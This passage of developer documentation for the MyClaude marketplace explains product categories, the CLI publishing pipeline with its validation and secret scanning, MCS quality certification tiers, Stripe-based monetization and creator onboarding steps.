Specification](/docs/creators/vault-yaml) — complete field reference including workflow defaults - [Writing Skills Guide](/docs/creators/writing-skills) — if your workflow is simpler as a single skill - [Building Agents](/docs/creators/building-agents) — agents as components within workflows - [Product Categories](/docs/creators/categories) — all 9 product types compared - [Publishing Your First Product](/docs/creators/publishing) — the basics of publishing any product type --- # Product Categories Choose the right product category for your MyClaude product. Each of the 9 categories has specific requirements and file structures. Category determines how the CLI installs your product, where files land in the buyer's environment, and which validation rules apply at publish time. Pick by answering: what does a buyer do immediately after installing this? ## Category overview | Category | `vault.yaml` value | Primary file | Install path | Invoked by | |----------|--------------------|--------------|--------------|------------| | Skill | `skill` | `SKILL.md` | `.claude/skills/` | `/skill-name` in Claude Code | | Squad | `squad` | `SQUAD.md` | `.claude/squads/` | `/squad-name` or agent roster | | Agent | `agent` | `AGENT.md` | `.claude/agents/` | Referenced by squads or directly | | Workflow | `workflow` | `WORKFLOW.md` | `.claude/workflows/` | `/workflow-name` | | Design System | `design-system` | `DESIGN-SYSTEM.md` | `.claude/design-systems/` | Injected into project context | | Prompt | `prompt` | `PROMPT.md` | `.claude/prompts/` | Copy into system prompt or task | | CLAUDE.md | `claude-md` | `CLAUDE.md` | Project root or `.claude/` | Loaded automatically by Claude Code | | Application | `application` | `APP.md` | `.claude/apps/` | `/app-name` or as specified | ## Skill A skill is a callable prompt routine. Buyers invoke it with `/skill-name` inside any Claude Code session. It is the most common product type — specific, reusable, and instantly useful. **Required files:** ``` my-skill/ SKILL.md # Required — prompt instructions vault.yaml # Required — manifest README.md # Optional — buyer-facing docs ``` **Use when:** Your product does one thing well and is invoked on demand. Code reviewers, commit message generators, security auditors, documentation writers. **Not when:** Your product needs multiple coordinated agents (use Squad), or it is a full application (use Application). Guide: [Writing Skills Guide](/docs/creators/writing-skills) ## Squad A squad is a team of agents with assigned roles, coordinated to handle complex tasks that benefit from specialization. The SQUAD.md defines the roster, roles, and coordination protocol. **Required files:** ``` my-squad/ SQUAD.md # Required — roster, roles, coordination rules agents/ agent-name.md # One file per agent in the squad vault.yaml ``` **Use when:** The task is too complex for one agent — different expertise is needed at different stages. Content teams, engineering squads, research teams. **Not when:** One well-written skill handles the use case. Squads are higher overhead for buyers to operate. ## Agent An agent is a single-purpose AI entity with a defined knowledge domain and behavior. Agents are often assembled into squads, but can also be installed and used independently. **Required files:** ``` my-agent/ AGENT.md # Required — identity, capabilities, constraints vault.yaml ``` **Use when:** You are building a specialist that will be composed into larger systems. A TypeScript reviewer, a security auditor, a brand voice enforcer. **Not when:** Your product is invoked directly by the buyer as a complete tool — use Skill. ## Workflow A workflow is a multi-step automation pipeline. It chains skills, agents, and external tools into a repeatable process with defined inputs, steps, and outputs. **Required files:** ``` my-workflow/ WORKFLOW.md # Required — steps, inputs, outputs, coordination steps/ step-name.md # Optional — step-specific instructions vault.yaml ``` **Use when:** The value is in the sequence, not any single step. CI/CD pipelines, deploy workflows, multi-stage analysis. **Not when:** The process has one or two steps — a skill handles that more simply. ## Design System A design system product delivers a complete token set, component library definition, and design rules. The DESIGN-SYSTEM.md gives Claude enough context to generate consistent UI code within the system's constraints. **Required files:** ``` my-design-system/ DESIGN-SYSTEM.md # Required — tokens, rules, component patterns tokens/ colors.yaml # Optional — structured token files typography.yaml vault.yaml ``` **Use when:** You have a complete, coherent design language with documented tokens and rules. Not when you have a color palette and nothing else. ## Prompt A prompt is a reusable system prompt or template. Buyers copy it into their Claude.ai system prompt, their project CLAUDE.md, or use it as a task template. Prompts are the simplest product type — no installation ceremony. **Required files:** ``` my-prompt/ PROMPT.md # Required — the prompt content vault.yaml ``` **Use when:** The value is in the prompt itself. Specialized analyzers, tone/style prompts, domain-specific system prompts that buyers adapt to their projects. ## CLAUDE.md A CLAUDE.md product is a project configuration file with behavioral rules, context, and directives for Claude Code. It installs into the buyer's project root, shaping how Claude behaves throughout that project. **Required files:** ``` my-claude-md/ CLAUDE.md # Required — the configuration vault.yaml ``` **Use when:** You have a well-tested Claude Code configuration for a specific context — enterprise compliance rules, framework-specific conventions, team coding standards. **Install behavior:** Unlike other categories, `claude-md` installs to the buyer's current project root, not a central directory. Buyers run `myclaude install` from inside their project. ## Application An application is a complete, deployable product built for or with Claude Code. It may include scaffolding scripts, multi-file structures, and configuration for external services. **Required files:** ``` my-app/ APP.md # Required — overview, setup, usage src/ # Optional — application source files setup.sh # Optional — setup script vault.yaml ``` **Use when:** You are selling a complete system, not a component. Dashboard generators, API scaffolders, full-stack starters. **Min CLI version:** Applications often use newer CLI features. Set `min_cli_version` in vault.yaml when your install process requires a specific CLI version. ## Choosing the right category Answer these questions in order: 1. Does the buyer invoke it on demand with a slash command? → **Skill** 2. Does it need multiple specialized agents? → **Squad** (or individual **Agents** for the components) 3. Is it a multi-step automation? → **Workflow** 4. Is it a design language with tokens and rules? → **Design System** 5. Is it a system prompt or reusable template? → **Prompt** 6. Is it a project-level Claude Code configuration? → **CLAUDE.md** 7. Is it a complete, deployable application? → **Application** When in doubt, start with Skill. It is the simplest structure and the easiest for buyers to adopt. Complexity can always be added in v2. ## Related pages - [Writing Skills Guide](/docs/creators/writing-skills) — deep dive into the most common category - [vault.yaml Specification](/docs/creators/vault-yaml) — category-specific field behavior - [Publishing Your First Product](/docs/creators/publishing) — publish any category in 5 minutes --- # CONDUIT Publishing Protocol CONDUIT is the publishing pipeline that carries your product from creation to marketplace listing. Three systems, one unbroken flow. Every product published to MyClaude travels through CONDUIT — whether you use the Creator Engine, the CLI directly, or a combination. Understanding this pipeline helps you diagnose publish failures, optimize your workflow, and build products that take full advantage of the metadata the marketplace can display. ## The three systems CONDUIT connects three independent systems that each own a distinct responsibility. ``` CREATOR ENGINE CLI MARKETPLACE API (creates products) (ships products) (serves products) Scaffold Read vault.yaml Authenticate Build content Collect files Validate payload Validate MCS Secret scan Persist to database Strip guidance Pack ZIP Index for search Generate vault.yaml Upload to R2 Serve to buyers Stage clean dir Call API Report result BOUNDARY A BOUNDARY B Clean directory POST with auth with vault.yaml + ZIP + fields at the root ``` **Boundary A** is a directory on disk. The Engine produces a clean directory with `vault.yaml` at its root. The CLI reads that directory. **Boundary B** is an HTTP request. The CLI sends an authenticated POST with a ZIP file and manifest fields. The API validates and persists. These boundaries are strict. The Engine never calls the API directly. The CLI never generates metadata. The API never trusts client-provided author information. ## Three tiers of usage Not every creator uses all three systems. CONDUIT supports three tiers depending on your workflow. ### Tier 1 — CLI-native You write files by hand, create `vault.yaml` yourself, and publish directly with the CLI. This is the simplest path and the one covered in [Publishing Your First Product](/docs/creators/publishing). ```bash $ mkdir my-skill && cd my-skill $ # write SKILL.md and vault.yaml by hand $ myclaude publish ``` The CLI handles everything from Boundary A onward: validation, scanning, packing, uploading, and API submission. ### Tier 2 — Engine-assisted You use the Creator Engine to scaffold, build, and validate your product. The Engine generates `vault.yaml` and stages a clean directory. You invoke the CLI from the Engine to publish. ``` /create skill # Engine scaffolds the project # ... write content with AI assistance ... /validate # Engine runs MCS checks /package # Engine stages .publish/ directory /publish # Engine invokes CLI from .publish/ ``` The Engine owns everything before Boundary A. The CLI takes over at Boundary A. You get richer metadata (MCS level, long descriptions, compatibility info) because the Engine populates vault.yaml v2 fields automatically. ### Tier 3 — Full automation For creators with established workflows, the Engine can detect changes in your workspace and trigger the publish pipeline automatically. This tier is aspirational — it builds on Tier 2 with file-watching and auto-validation. ``` # Creator edits files in workspace/my-skill/ # Engine detects changes → /validate → /package → /publish ``` Most creators will use Tier 1 or Tier 2. Tier 3 is designed for prolific creators managing multiple products. ## Pipeline stages When you run `myclaude publish`, four stages execute in sequence. Each must pass before the next begins. ### Stage 1 — Validate The CLI reads `vault.yaml` and checks every field against the schema. **What happens:** - Parses YAML and checks syntax - Validates required fields: `name`, `version`, `type` (or `category`), `description`, `entry` - Checks field constraints: name format, version is valid SemVer, description under 160 characters, price is 0 or >= 1.00, tags are max 5 and under 30 characters each - Warns on missing recommended fields: `display_name`, `license`, `tags` - Passes through enrichment fields silently: `mcs_level`, `language`, `long_description`, `compatibility`, `dependencies` **What can fail:** | Error | Cause | Fix | |-------|-------|-----| | `vault.yaml not found` | No manifest in current directory | Run `myclaude init` or create vault.yaml manually | | `missing required field 'description'` | Required field absent | Add the field to vault.yaml | | `name: invalid format` | Name contains uppercase, spaces, or special characters | Use lowercase with hyphens only: `my-product-name` | | `version: not valid semver` | Unquoted or malformed version | Quote the version: `version: "1.0.0"` | | `price: value 0.50 is below minimum` | Price between 0.01 and 0.99 | Use `0` for free or `>= 1.00` for paid | Run `myclaude validate` at any time to check your manifest without publishing. ### Stage 2 — Scan The CLI scans all product files for content policy violations and secrets. **What happens:** - Secret scan: checks for API keys, tokens, passwords, private keys, and other credential patterns across all files - Content policy scan: checks for prohibited content per [Content Policy](/docs/legal/content-policy) - Collects all files in the directory, respecting `.vaultignore` if present **What can fail:** | Error | Cause | Fix | |-------|-------|-----| | `Secret detected in SKILL.md:14` | File contains what looks like an API key or token | Remove the credential. Use environment variables or placeholders instead | | `Content policy violation: [reason]` | Content violates marketplace policy | Remove the flagged content and re-run | The secret scanner is intentionally aggressive. False positives happen — if a string matches a credential pattern but is not actually a secret, you can add it to `.vaultignore` or restructure the content. ### Stage 3 — Upload The CLI packs your files into a ZIP and uploads to storage. **What happens:** - Collects all files (respecting `.vaultignore`) - Creates a ZIP with the product files - Computes checksum and file metadata (count, total size) - Uploads the ZIP to Cloudflare R2 storage - Receives a file key for the API submission **What can fail:** | Error | Cause | Fix | |-------|-------|-----| | `Authentication required` | CLI session expired or never authenticated | Run `myclaude login` | | `Upload failed: network error` | Connection issue during upload | Check your internet connection and retry | | `File too large` | ZIP exceeds size limit | Reduce file count or content. Products should be lean | ### Stage 4 — Listing The CLI sends manifest fields and the uploaded file reference to the marketplace API, which creates or updates the product listing. **What happens:** - CLI sends authenticated POST to `/api/cli/products/create` - API verifies the auth token and extracts user identity - API validates all manifest fields server-side - API persists the product to Firestore - API indexes the product for search - CLI receives the product URL and reports success **What can fail:** | Error | Cause | Fix | |-------|-------|-----| | `Name already taken` | Another product with this name exists under your namespace | Choose a different `name` in vault.yaml | | `Author mismatch` | `author` field does not match your authenticated account | Update `author` to match your username, or run `myclaude login` with the correct account | | `Stripe required for paid products` | Price > 0 but no Stripe connected | Connect Stripe in [Settings](/dashboard/settings) or set `price: 0` | | `Version must be higher than published` | Trying to re-publish a version that already exists | Increment the version in vault.yaml | A successful publish prints: ``` Validating vault.yaml... OK Scanning content... OK Uploading files... OK Creating listing... OK Published: myclaude.sh/p/your-username-my-product ``` ## How vault.yaml flows through the pipeline Every field in your `vault.yaml` takes a specific path from your local file to the marketplace. ``` vault.yaml CLI reads CLI sends API stores Marketplace shows ---------- --------- --------- ---------- ----------------- name -> manifest.name -> slug -> slug -> URL, listing version -> manifest.version -> version -> version -> version badge type -> manifest.type -> category (mapped) -> category -> category filter description -> manifest.desc -> description -> description -> listing card display_name -> manifest.display -> title -> title -> listing title license -> manifest.license -> license -> license -> license badge tags -> manifest.tags -> tags -> tags[] -> search, filter price -> manifest.price -> price -> price -> checkout mcs_level -> manifest.mcs -> mcsLevel -> mcsLevel -> MCS badge ``` Fields like `author`, timestamps, and download stats are server-authoritative — the API computes them from your auth token and server state, not from vault.yaml. See [vault.yaml Specification](/docs/creators/vault-yaml) for the complete field reference. ## Integration with Creator Engine If you use the Creator Engine, the publish flow adds steps before the CLI takes over. The Engine's `/package` command: 1. Strips guidance comments from your workspace files 2. Copies clean files to a `.publish/` staging directory 3. Generates `vault.yaml` v2 with enrichment fields (MCS level, language, compatibility) 4. Generates or updates `CHANGELOG.md` 5. Copies LICENSE file 6. Re-validates MCS-1 on the staged contents 7. Reports that the package is ready The Engine's `/publish` command: 1. Verifies `.publish/` exists with a valid `vault.yaml` 2. Asks for final confirmation (price, tags, description) 3. Invokes `myclaude publish` from the `.publish/` directory 4. The CLI takes over from here (Stage 1 through Stage 4 above) 5. Engine parses the CLI result and updates internal state The Engine never creates the ZIP. The Engine never calls the marketplace API. These are CLI responsibilities. This separation means you can always fall back to CLI-only publishing if the Engine is unavailable. ## Error recovery When publish fails, the CLI tells you which stage failed and why. Here is the recovery path for each. **Stage 1 failure (Validate):** Fix the vault.yaml error the CLI reported. Run `myclaude validate` to confirm the fix before retrying. **Stage 2 failure (Scan):** Remove the flagged content. If it is a false positive on the secret scanner, restructure the content to avoid the pattern. Re-run `myclaude publish`. **Stage 3 failure (Upload):** This is almost always a network or authentication issue. Run `myclaude login` to refresh credentials, check your connection, and retry. Your local files are not modified during upload — retrying is safe. **Stage 4 failure (Listing):** The API rejected the submission. Common causes: name collision, version not incremented, or Stripe not connected for paid products. Fix the specific issue and re-run. Upload will not re-upload if the file has not changed. Publishing is idempotent. Running `myclaude publish` twice with the same version updates the existing listing rather than creating a duplicate. Running it with an incremented version creates a new version of the same product. ## Related pages - [vault.yaml Specification](/docs/creators/vault-yaml) — complete field reference for the manifest - [Publishing Your First Product](/docs/creators/publishing) — step-by-step publish tutorial - [MCS Certification](/docs/creators/mcs-certification) — the quality tier system that CONDUIT propagates - [Content Policy](/docs/legal/content-policy) — what the content scan checks for --- # MCS Certification MCS (MyClaude Certified Standard) is the quality system that tells buyers what they are getting before they install. Every product on MyClaude carries an MCS level. It is not decorative — it drives search ranking, enables premium pricing, and builds the trust that makes a marketplace work. This page explains what each level means, what it requires, and why it matters. ## Why MCS exists A marketplace without quality signals becomes a junk drawer. Buyers cannot distinguish a polished, tested product from a placeholder someone published in five minutes. Creators who invest real expertise in their products get buried under volume. Prices race to zero because nothing differentiates products on quality. MCS solves this by making quality visible. When a buyer sees an MCS-3 Gold badge, they know the product has been validated against a specific, meaningful standard. When a creator invests the work to reach MCS-3, they earn tangible benefits — better placement, justified pricing, and buyer trust. The system is designed to be progressive. MCS-1 is achievable in your first publish. MCS-3 is aspirational — it represents genuine craft. The gap between them is intentional. It gives creators something to build toward, and gives buyers a reason to pay more. ## The three levels ### MCS-1 Bronze — Publishable The minimum bar for marketplace listing. Every product on MyClaude is at least MCS-1. Validation is fully automated — the CLI and Creator Engine can verify all requirements without human review. **Requirements:** - Valid `vault.yaml` with all required fields (name, version, type, description, entry) - Primary content file exists and is non-empty (SKILL.md, AGENT.md, SQUAD.md, etc.) - README.md present with setup instructions - No secret or credential patterns in any file - No content policy violations - All file references in vault.yaml resolve to actual files - No placeholder content (TODO, lorem ipsum, FIXME markers) **What the automated checks verify:** ``` myclaude validate structure-check correct files for product type? metadata-check all required fields present and valid? reference-check all file references resolve? content-length minimum viable content (not empty stubs)? secret-scan no credentials or API keys? readme-check README present with required sections? placeholder-scan no TODO/lorem/placeholder content? ``` MCS-1 answers one question: "Is this product complete enough to not waste a buyer's time?" If all checks pass, the product is publishable. ### MCS-2 Silver — Quality Products that demonstrate craft, thoroughness, and real testing. MCS-2 validation is semi-automated — most checks run automatically, but some require creator self-reporting. **Requirements (everything in MCS-1, plus):** - At least 3 examples or exemplars covering different use cases - Anti-patterns section documenting what NOT to do - Tested with at least 5 different user intents or scenarios - Error handling for edge cases - No shallow or generic content — depth appropriate to the product's domain - Consistent output format across different inputs - Average rating of 4.0 or higher (once reviews exist) - At least 10 downloads (proves real-world usage) **What the checks verify:** ``` myclaude validate --level=2 All MCS-1 checks exemplar-count >= 3 examples? anti-pattern-check anti-patterns section exists? depth-check content exceeds minimum word count? format-check output format is specified and consistent? [self-report] tested with 5+ intents? ``` The rating and download thresholds are checked by the marketplace, not the CLI. A product can be locally validated at MCS-2 for content quality, but the badge only appears on the marketplace once the community thresholds are met. MCS-2 answers a harder question: "Is this product good enough that buyers will recommend it?" ### MCS-3 Gold — State-of-the-Art The highest tier. Products that set the bar for their category. MCS-3 validation requires agent-assisted review — an AI agent analyzes the product for depth, composability, and resilience to edge cases. **Requirements (everything in MCS-2, plus):** - Deep knowledge base encoded in references (domain expertise that AI alone could not generate) - Adaptive modes — works in different contexts, constraints, or user skill levels - Composable — works well alongside other MyClaude products - Stress-tested against ambiguous, adversarial, and edge-case inputs - Progressive depth modes (surface for quick use, deep for thorough analysis) - Verified author (identity confirmed through marketplace verification) - Consistent update history — active maintenance, not a single publish and abandon - Community engagement — responds to reviews, ships improvements based on feedback **What the checks verify:** ``` myclaude validate --level=3 All MCS-2 checks [agent] depth-review references contain real expertise? [agent] composability-test works with standard products? [agent] stress-test handles ambiguity and adversarial input? [agent] progressive-depth surface/dive/radical modes work? [agent] token-efficiency reasonable context usage? ``` Agent review means a specialized AI reviewer analyzes your product content. It is not a rubber stamp — the agent evaluates whether your product encodes genuine domain expertise or is simply reorganized generic knowledge. Products that could be fully generated by AI without domain input will not pass MCS-3. MCS-3 answers the most demanding question: "Is this product the best available in its niche?" ## Requirements at a glance | Requirement | MCS-1 Bronze | MCS-2 Silver | MCS-3 Gold | |-------------|:---:|:---:|:---:| | Valid vault.yaml | Required | Required | Required | | Primary content file | Required | Required | Required | | README.md | Required | Required | Required | | Passes secret scan | Required | Required | Required | | No placeholder content | Required | Required | Required | | 3+ examples | -- | Required | Required | | Anti-patterns section | -- | Required | Required | | Tested with 5+ intents | -- | Required | Required | | Error handling | -- | Required | Required | | Average rating >= 4.0 | -- | Required | Required | | 10+ downloads | -- | Required | Required | | Deep knowledge base | -- | -- | Required | | Adaptive modes | -- | -- | Required | | Composable | -- | -- | Required | | Stress-tested | -- | -- | Required | | Verified author | -- | -- | Required | | Active maintenance | -- | -- | Required | ## Benefits of certification Higher MCS levels unlock tangible benefits on the marketplace. | Benefit | MCS-1 | MCS-2 | MCS-3 | |---------|-------|-------|-------| | Listed on marketplace | Yes | Yes | Yes | | Searchable and installable | Yes | Yes | Yes | | Quality badge on product page | Bronze | Silver | Gold | | Search ranking boost | Baseline | Moderate boost | Significant boost | | Featured in category pages | No | Eligible | Priority | | Premium pricing credibility | Limited | Justified | Expected | | Creator reputation weight | Base | Enhanced | Maximum | | Featured in curated collections | No | Eligible | Priority | The search ranking boost is the most impactful benefit for most creators. When a buyer searches for "code review," MCS-3 products appear before MCS-2 products, which appear before MCS-1 products, all else being equal. This is not a minor tiebreaker — it is a primary ranking signal. Premium pricing tracks with MCS level. The marketplace does not enforce pricing by tier, but buyer behavior does. MCS-3 products routinely command 5-10x the price of MCS-1 products in the same category because buyers have a concrete quality signal justifying the price. ## How to achieve each level ### Reaching MCS-1 Every creator starts here. If you follow [Publishing Your First Product](/docs/creators/publishing), you will naturally produce an MCS-1 product. **Checklist:** 1. Run `myclaude init` to scaffold your project with the correct file structure 2. Fill in `vault.yaml` with accurate metadata — no placeholder descriptions 3. Write your primary content file (SKILL.md, AGENT.md, etc.) with real, complete instructions 4. Write a README.md with: what the product does, how to install, how to use, a basic example 5. Run `myclaude validate` and fix any errors 6. Run `myclaude publish` Common reasons MCS-1 validation fails: placeholder content left in scaffolded files, missing README, description exceeds 160 characters, unquoted version string. ### Reaching MCS-2 MCS-2 requires investment beyond the minimum. Budget 2-4 hours of refinement on top of your initial publish. **Checklist:** 1. Add at least 3 examples covering different use cases — not variations of the same case, but genuinely different scenarios 2. Add an anti-patterns section: what should your product NOT be used for? What inputs produce bad results? 3. Test with 5 different user intents. Document what you tested and what happened. Fix any inconsistencies 4. Add error handling: what does your product do with ambiguous input? Incomplete context? Edge cases? 5. Review the output format: is it consistent across all your test cases? Tighten the format specification if not 6. Run `myclaude validate --level=2` and fix any gaps 7. Publish the update. Wait for 10 downloads and a 4.0+ average rating The download and rating thresholds will come naturally if your product is useful. Focus on quality — the metrics follow. ### Reaching MCS-3 MCS-3 is not a weekend project. It represents the kind of expertise that takes months or years to develop, packaged into a product that delivers that expertise reliably. **Checklist:** 1. Build a genuine knowledge base. Encode domain expertise that cannot be reproduced by asking an AI to "write a skill about X." If your references section reads like a textbook summary, it is not deep enough 2. Implement adaptive modes: surface mode for quick answers, deep mode for thorough analysis, and optionally a radical mode for unconventional approaches 3. Test composability: install your product alongside other MyClaude products and verify they work together without conflicts 4. Stress-test: feed your product ambiguous input, contradictory instructions, adversarial prompts. Document how it handles each 5. Verify your author account through the marketplace verification process 6. Ship at least 2-3 updates based on real user feedback before pursuing MCS-3 7. Run `myclaude validate --level=3` which triggers agent review The agent review is the gate that separates MCS-2 from MCS-3. It evaluates whether your product encodes genuine expertise, handles stress gracefully, and works as part of the broader ecosystem. Expect to iterate. ## What disqualifies a product Certain conditions prevent MCS certification or can cause an existing certification to be downgraded. **Blocks certification entirely:** - Content policy violations (hate speech, illegal content, deceptive claims) - Secret or credential exposure in product files - Plagiarism of another creator's product - Fraudulent reviews or artificial download inflation **Downgrades existing certification:** - Abandonment: no updates or review responses for 6+ months drops MCS-3 to MCS-2 - Rating degradation: average rating falling below 4.0 drops MCS-2 products to MCS-1 - Policy violations discovered post-publish: immediate downgrade to MCS-1 pending review **Will not pass MCS-2+ validation:** - Generic content that any AI could generate without domain input (the Anti-Commodity Gate) - Shallow examples that are variations of the same scenario - Missing error handling - Products that try to do everything instead of one thing well The Anti-Commodity Gate deserves emphasis. Before publishing any product at MCS-2 or above, the validation system checks: does this product encode expertise that differentiates it from what a buyer could get by simply asking Claude? If the answer is no, the product stays at MCS-1 until the creator adds genuine depth. This is coaching, not rejection — the validation provides specific feedback on what depth is missing. ## MCS for different product types Each product category has type-specific MCS requirements. The tables below show what each level requires for the most common types. ### Skills | Level | Specific Requirements | |-------|----------------------| | MCS-1 | Valid SKILL.md + 1 reference + README + metadata | | MCS-2 | + 3 exemplars + anti-patterns + tested with 5 intents | | MCS-3 | + knowledge base + adaptive modes + composable + stress-tested + progressive depth | ### Agents | Level | Specific Requirements | |-------|----------------------| | MCS-1 | Valid AGENT.md + identity + tool list + README | | MCS-2 | + architecture doc + 3 example interactions + edge case handling | | MCS-3 | + cognitive architecture + stress-tested prompts + composable with squads | ### Squads | Level | Specific Requirements | |-------|----------------------| | MCS-1 | Valid SQUAD.md + 2+ agents + routing table + README | | MCS-2 | + handoff protocols + 3 workflow examples + capability index | | MCS-3 | + stress-tested routing + composable agents + performance metrics | ### Workflows | Level | Specific Requirements | |-------|----------------------| | MCS-1 | Valid WORKFLOW.md + 3+ steps + README | | MCS-2 | + configurable variables + error handling + 2 execution examples | | MCS-3 | + composable with other workflows + adaptive modes + metrics | See [Product Categories](/docs/creators/categories) for the complete list of category-specific requirements. ## Pricing and MCS The marketplace does not set prices — creators do. But MCS level shapes buyer expectations. | MCS Level | Typical Price Range | Buyer Expectation | |-----------|--------------------|--------------------| | MCS-1 Bronze | Free - $5 | Works, but may be rough around edges | | MCS-2 Silver | $5 - $29 | Polished, tested, reliable | | MCS-3 Gold | $19 - $99+ | Best-in-class, deeply expert, actively maintained | These are patterns from marketplace behavior, not rules. A free MCS-3 product is fine. A $49 MCS-1 product will struggle because buyers expect MCS-1 products to be lower-priced. The general principle: MCS level justifies price. If you want to charge premium, invest in quality first. See [Monetization Guide](/docs/creators/monetization) for detailed pricing strategies. ## Related pages - [CONDUIT Publishing Protocol](/docs/creators/conduit-protocol) — how MCS flows through the publish pipeline - [vault.yaml Specification](/docs/creators/vault-yaml) — the `mcs_level` field in your manifest - [Publishing Your First Product](/docs/creators/publishing) — achieve MCS-1 with your first publish - [Monetization Guide](/docs/creators/monetization) — pricing strategies by MCS tier - [Product Categories](/docs/creators/categories) — category-specific MCS requirements --- # Monetization Guide MyClaude creators receive 92% of each sale via Stripe Connect. Free products build reputation; paid products build revenue. This guide covers the revenue model, how to connect Stripe, pricing strategies that work, and the mechanics of getting paid. Start with the revenue model — it informs every pricing decision. ## Revenue model Every paid transaction on MyClaude follows the same split: | Component | Rate | Notes | |-----------|------|-------| | Creator revenue | 92% of sale price | Paid out via Stripe Connect | | Platform fee | 8% of sale price | Covers infrastructure, content scanning, payments | | Stripe processing | ~2.9% + $0.30 | Deducted from creator's 92% by Stripe | On a $20 sale: - Buyer pays: $20.00 - Platform receives: $1.60 (8%) - Creator receives before Stripe: $18.40 (92%) - Stripe deducts: ~$0.88 (2.9% + $0.30) - Creator net: ~$17.52 Free products have no fees and no revenue. They are a tool for building reputation, downloads, and reviews — which convert into paid product sales. ## Free vs. paid Free and paid are not opposites. They are a strategy. | Dimension | Free | Paid | |-----------|------|------| | Barrier to install | None | Requires payment decision | | Downloads | Higher | Lower | | Stripe required | No | Yes | | Builds reviews | Yes | Yes | | Builds revenue | No | Yes | | Best for | Entry-level products, lead-generation for paid work | Proven, high-value products | A common creator path: publish a free version of your skill that handles 80% of the use case, then sell a paid Pro version with the remaining 20% that professionals need. The free product feeds the paid funnel. ## Pricing strategies ### Value-based pricing Price what the skill is worth to the buyer, not what it cost you to build. A skill that saves a developer 30 minutes per week is worth more than $5 — even if you wrote it in an afternoon. | Price range | Positioning | |-------------|-------------| | $0 | Free — builds downloads and reputation | | $1–$9 | Impulse buy — low friction, high volume | | $10–$29 | Considered purchase — clear value proposition required | | $30–$99 | Professional tool — niche expertise, strong reviews needed | | $100+ | Enterprise tier — deep integration, support implied | ### Niche over breadth "Code reviewer" competes with free tools. "Django REST Framework security auditor" has defensible value. Narrow pricing at $15-29 outperforms broad pricing at $5 — because the buyer with the specific problem will pay for the exact solution. ### Version strategy Start at $0 or $5. Validate with downloads and reviews. Raise price when reviews confirm value. The market will tell you when you are underpriced — people start thanking you in reviews for things they expected to pay more for. ## Setting up Stripe Connect ### Why Stripe Connect? MyClaude uses Stripe Connect Express so creators are paid directly — the platform never holds your money. Every sale triggers a direct transfer to your Stripe account. ### How to connect 1. Go to [myclaude.sh/dashboard/settings](/dashboard/settings) 2. Click **Connect Stripe** 3. Complete Stripe's onboarding (country, business type, bank account, identity verification) 4. Return to MyClaude — your dashboard shows **Stripe: Connected** Stripe onboarding takes 3-5 minutes for most creators. Identity verification (required by Stripe for payouts) may take up to 24 hours in some regions. ### Stripe account requirements | Requirement | Details | |-------------|---------| | Country | Stripe Connect is available in [35+ countries](https://stripe.com/global) | | Bank account | Must be in the same currency as your payout currency | | Identity | Government ID required for payouts above Stripe's verification threshold | | Business type | Individual or company both work | You do not need a registered business. Individual creators use Stripe Connect as sole proprietors. ## Payout schedule Stripe's standard payout schedule applies: payouts are typically initiated 2 business days after a successful charge. The exact timing depends on your Stripe account settings and country. | Event | Timing | |-------|--------| | Buyer completes purchase | Immediate | | Stripe charge confirmed | ~30 seconds | | Transfer initiated to creator | 2 business days (standard) | | Funds in bank account | 1-2 additional business days depending on bank | You can view your payout history and upcoming transfers in your [Stripe Express Dashboard](https://connect.stripe.com/express_login). Access it from MyClaude Settings. ## Can I change my price? Yes. Update `price` in `vault.yaml` and run `myclaude publish`. The new price applies to future purchases immediately. Buyers who already purchased retain access — price changes do not affect existing orders. You can set `price: 0` at any time to make a paid product free. You cannot retroactively charge existing free-product users. ## Tips for maximizing revenue **Publish a README that sells.** The product description in vault.yaml is 160 characters. Your README.md has no limit — use it to show the exact output buyers will get. Screenshots, before/after examples, and specific use cases convert browsers into buyers. **Respond to reviews.** A creator who responds to feedback signals that the product is maintained. Maintenance signals reduce buyer risk perception, which increases willingness to pay. **Update frequently in the early period.** A product with 5 versions in its first month shows active development. Ship small improvements, bump the version, re-publish. Each update re-surfaces your product in the "recently updated" filter. **Price in round numbers.** $20 and $25 convert better than $19.99 and $24.50. The Claude Code audience is technical — they know the psychology of .99 pricing and it reads as noise. ## How do I track earnings? Your MyClaude dashboard shows total sales and revenue. For detailed transaction history, payout schedule, and tax documents, use your Stripe Express Dashboard — accessible from [myclaude.sh/dashboard/settings](/dashboard/settings). ## Related pages - [Creator Onboarding](/docs/creators/onboarding) — connect Stripe during setup - [Pricing & Revenue](/docs/getting-started/pricing) — buyer-facing revenue model explanation - [Publishing Your First Product](/docs/creators/publishing) — get your product live --- # Creator Onboarding You need three things before you can publish: an account, a Stripe connection (for paid products), and the CLI. The whole setup takes under 10 minutes. By the end you will have a creator account, a connected Stripe account for payouts, and the CLI installed. Then you can publish. ## Step 1 — Create your account Go to [myclaude.sh/register](/register) and create an account. Use the email address you want associated with your creator profile. After registering, navigate to your dashboard at [myclaude.sh/dashboard](/dashboard). Your creator profile is automatically created — you get a public profile at `myclaude.sh/u/your-username`. Choose your username carefully. It becomes the namespace for all your products: `@your-username/product-name`. You can update your display name later, but username changes affect existing product URLs. ## Step 2 — Connect Stripe MyClaude pays creators via Stripe Connect Express. You need a Stripe account to receive payouts from paid products. Free products do not require Stripe. Go to [myclaude.sh/dashboard/settings](/dashboard/settings) and click **Connect Stripe**. This opens Stripe's onboarding flow where you enter: - Your country and business type (individual or company) - Bank account details for payouts - Identity verification (required by Stripe for payouts) Stripe onboarding typically takes 3-5 minutes. Once connected, your dashboard shows **Stripe: Connected** and a green status indicator. | Stripe status | What it means | |---------------|---------------| | Not connected | You can publish free products only | | Connected | You can publish free and paid products | | Restricted | Stripe requires additional verification — check your Stripe dashboard | You do not need Stripe to publish free products. Connect it when you are ready to monetize. ## Step 3 — Install the CLI The CLI is how you publish products. Install it globally: ```bash $ npm install -g @myclaude-cli/cli ``` Verify the install: ```bash $ myclaude --version # myclaude 1.x.x ``` Then authenticate: ```bash $ myclaude login ``` This opens your browser to complete OAuth with your MyClaude account. After authentication, the CLI stores your credentials locally. You stay logged in across sessions. ## Step 4 — Your first product You are ready to publish. The next step is creating your first product. Two paths from here: **Fastest path** — Follow [Publishing Your First Product](/docs/creators/publishing). You will scaffold, edit, and publish in under 5 minutes. **Skill-specific path** — Follow [Writing Skills Guide](/docs/creators/writing-skills) for a step-by-step walkthrough of building a skill from scratch. Not sure what to publish? Read [Product Categories](/docs/creators/categories) to understand which category fits your idea. ## Creator profile Your public profile at `myclaude.sh/u/your-username` shows: - All your published products - Total downloads and ratings - Stripe Connect status (not the financial details — just Connected/Not connected) - Bio and links (editable in Settings) Fill in your bio before publishing. 